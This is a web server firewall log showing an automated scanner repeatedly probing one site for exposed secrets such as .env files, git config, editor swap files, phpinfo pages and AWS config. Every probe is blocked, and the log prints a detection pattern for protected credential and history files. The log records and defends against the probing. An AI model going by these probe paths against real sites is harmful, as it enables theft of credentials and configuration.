[Tue May 26 14:48:47.362317 2026] [security2:error] [pid 648203:tid 648309] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config~"] [unique_id "ahVld7EQDDtxJNiDrdTcmAAAoGk"]
[Tue May 26 14:48:47.805395 2026] [security2:error] [pid 648203:tid 648318] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVld7EQDDtxJNiDrdTc2gAAu3I"]
[Tue May 26 14:48:47.807988 2026] [security2:error] [pid 648203:tid 648330] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/ADMIN/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc3QAAu34"]
[Tue May 26 14:48:47.810651 2026] [security2:error] [pid 648203:tid 648237] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/API/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc3wAAuyE"]
[Tue May 26 14:48:47.852756 2026] [autoindex:error] [pid 648203:tid 648231] [remote 195.178.110.199:55984] AH01276: Cannot serve directory /home2/onesomzc/public_html/www.landsonlogistics.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:48:47.950557 2026] [security2:error] [pid 648203:tid 648233] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/APP/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc6QAA_R0"]
[Tue May 26 14:48:47.956192 2026] [security2:error] [pid 648203:tid 648224] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/BACKEND/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc7AAA_RQ"]
[Tue May 26 14:48:47.956364 2026] [security2:error] [pid 648203:tid 648247] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/BE/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc7QAA_Ss"]
[Tue May 26 14:48:47.956710 2026] [security2:error] [pid 648203:tid 648240] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/BACK/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc6wAA_SQ"]
[Tue May 26 14:48:47.956724 2026] [security2:error] [pid 648203:tid 648227] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/Api/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc6gAA_Rc"]
[Tue May 26 14:48:47.957518 2026] [security2:error] [pid 648203:tid 648217] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/Backend/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc7wAA_Q0"]
[Tue May 26 14:48:47.958191 2026] [security2:error] [pid 648203:tid 648221] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/Be/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc8AAA_RE"]
[Tue May 26 14:48:48.151957 2026] [security2:error] [pid 648203:tid 648451] [client 45.3.42.227:40987] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVld7EQDDtxJNiDrdTcagAAAPs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:48.252311 2026] [security2:error] [pid 648203:tid 648256] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVleLEQDDtxJNiDrdTdFQAA8jQ"]
[Tue May 26 14:48:48.260469 2026] [security2:error] [pid 648203:tid 648285] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/admin-app/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdHQAA6lE"]
[Tue May 26 14:48:48.404186 2026] [security2:error] [pid 648203:tid 648277] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVleLEQDDtxJNiDrdTdKAAAyUk"]
[Tue May 26 14:48:48.405440 2026] [security2:error] [pid 648203:tid 648306] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/api-backend/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdLgAAyWY"]
[Tue May 26 14:48:48.405601 2026] [security2:error] [pid 648203:tid 648314] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVleLEQDDtxJNiDrdTdLQAAyW4"]
[Tue May 26 14:48:48.545827 2026] [security2:error] [pid 648203:tid 648207] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/api-node/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdNAAAyQM"]
[Tue May 26 14:48:48.546809 2026] [security2:error] [pid 648203:tid 648304] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/api/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdNgAAyWQ"]
[Tue May 26 14:48:48.552636 2026] [security2:error] [pid 648203:tid 648208] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/api/info.php"] [unique_id "ahVleLEQDDtxJNiDrdTdQQAAyQQ"]
[Tue May 26 14:48:48.694933 2026] [security2:error] [pid 648203:tid 648299] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/api/phpinfo.php"] [unique_id "ahVleLEQDDtxJNiDrdTdSwAAyV8"]
[Tue May 26 14:48:48.703287 2026] [security2:error] [pid 648203:tid 648309] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/administrator/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdKwAAyWk"]
[Tue May 26 14:48:48.814054 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.5:27814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/app/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdVgAAAOM"]
[Tue May 26 14:48:48.837335 2026] [security2:error] [pid 648203:tid 648327] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/apis/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdVwAA6Hs"]
[Tue May 26 14:48:48.842789 2026] [security2:error] [pid 648203:tid 648320] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/app/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdXQAAzXQ"]
[Tue May 26 14:48:48.993910 2026] [security2:error] [pid 648203:tid 648239] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/application/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdcgAAjyM"]
[Tue May 26 14:48:48.995395 2026] [security2:error] [pid 648203:tid 648220] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/apps/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdcwAAjxA"]
[Tue May 26 14:48:49.534580 2026] [security2:error] [pid 648203:tid 648260] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/back-api/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdnQAAmDg"]
[Tue May 26 14:48:49.537218 2026] [security2:error] [pid 648203:tid 648268] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/back-end/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdnwAAmEA"]
[Tue May 26 14:48:49.684507 2026] [security2:error] [pid 648203:tid 648261] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backup/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdrgAAwTk"]
[Tue May 26 14:48:49.684546 2026] [security2:error] [pid 648203:tid 648281] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/beta/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdsAAAwU0"]
[Tue May 26 14:48:49.685706 2026] [security2:error] [pid 648203:tid 648269] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/be/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdrwAAwUE"]
[Tue May 26 14:48:49.700238 2026] [security2:error] [pid 648203:tid 648249] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/back/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdswAA1y0"]
[Tue May 26 14:48:49.700439 2026] [security2:error] [pid 648203:tid 648285] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdtAAA11E"]
[Tue May 26 14:48:49.701387 2026] [security2:error] [pid 648203:tid 648287] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend-api/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdsgAA11M"]
[Tue May 26 14:48:49.866298 2026] [security2:error] [pid 648203:tid 648314] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/cms/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdzgAA924"]
[Tue May 26 14:48:49.872113 2026] [security2:error] [pid 648203:tid 648207] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/client/.env"] [unique_id "ahVlebEQDDtxJNiDrdTd0QAA9wM"]
[Tue May 26 14:48:49.980577 2026] [security2:error] [pid 648203:tid 648311] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config.php"] [unique_id "ahVlebEQDDtxJNiDrdTd1AAAo2s"]
[Tue May 26 14:48:49.996122 2026] [security2:error] [pid 648203:tid 648403] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlebEQDDtxJNiDrdTdpQAAAMs"]
[Tue May 26 14:48:49.998782 2026] [security2:error] [pid 648203:tid 648208] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/config/.env"] [unique_id "ahVlebEQDDtxJNiDrdTd2gAAogQ"]
[Tue May 26 14:48:50.020970 2026] [security2:error] [pid 648203:tid 648313] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/aws.php"] [unique_id "ahVlerEQDDtxJNiDrdTd4AAAn20"]
